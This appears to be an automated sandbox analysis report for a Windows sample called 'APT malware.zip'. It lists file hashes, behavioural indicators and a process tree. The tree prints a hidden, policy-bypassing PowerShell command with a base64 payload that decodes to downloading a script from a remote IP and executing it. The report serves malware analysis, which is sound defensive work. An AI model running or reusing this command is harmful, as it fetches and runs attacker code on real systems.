6d1374bb816d1e54b4cffae41830837e0c83985156a4b33f5dbce644bdb61de9

Resubmissions

23-09-2023 06:54

22-09-2023 05:10

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
23-09-2023 06:54

Target

APT malware.zip
Size

1.7MB
MD5

e592b6b828fb175e0b00840e7d79a3b8
SHA1

48ad32246f2fea1888e8a084258607f5a9988a24
SHA256

6d1374bb816d1e54b4cffae41830837e0c83985156a4b33f5dbce644bdb61de9
SHA512

47083251696dcf0a5b5a489a9e000c3c2c8a1d110905b4460a6862f3669db3927fec90543c93d030b22b406efb7db0dc3344e85d6c478d649e1e4afba96061f3
SSDEEP

49152:kboYzEp67lBFpmR35Qap7+FmUMhQlSfqUT6mz6z6:kbjz267lpSQap7tUmqSfLLz6z6

Score

1^/10

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
304	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	304	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 704	2300	ekeng-mta.exe	32
PID 2300 wrote to memory of 704	2300	ekeng-mta.exe	32
PID 2300 wrote to memory of 704	2300	ekeng-mta.exe	32
PID 704 wrote to memory of 304	704	cmd.exe	34
PID 704 wrote to memory of 304	704	cmd.exe	34
PID 704 wrote to memory of 304	704	cmd.exe	34

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\APT malware.zip"
1⤵
PID:1632

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
1⤵
PID:2632

C:\Users\Admin\Documents\APT malware\ekeng-mta.exe
"C:\Users\Admin\Documents\APT malware\ekeng-mta.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:304

memory/304-4-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

Filesize
2.9MB

Download
memory/304-6-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/304-5-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

Filesize
9.6MB

Download
memory/304-7-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/304-8-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/304-9-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

Filesize
9.6MB

Download
memory/304-10-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/304-11-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-12-0x0000000000400000-0x000000000058F000-memory.dmp

Filesize
1.6MB

Download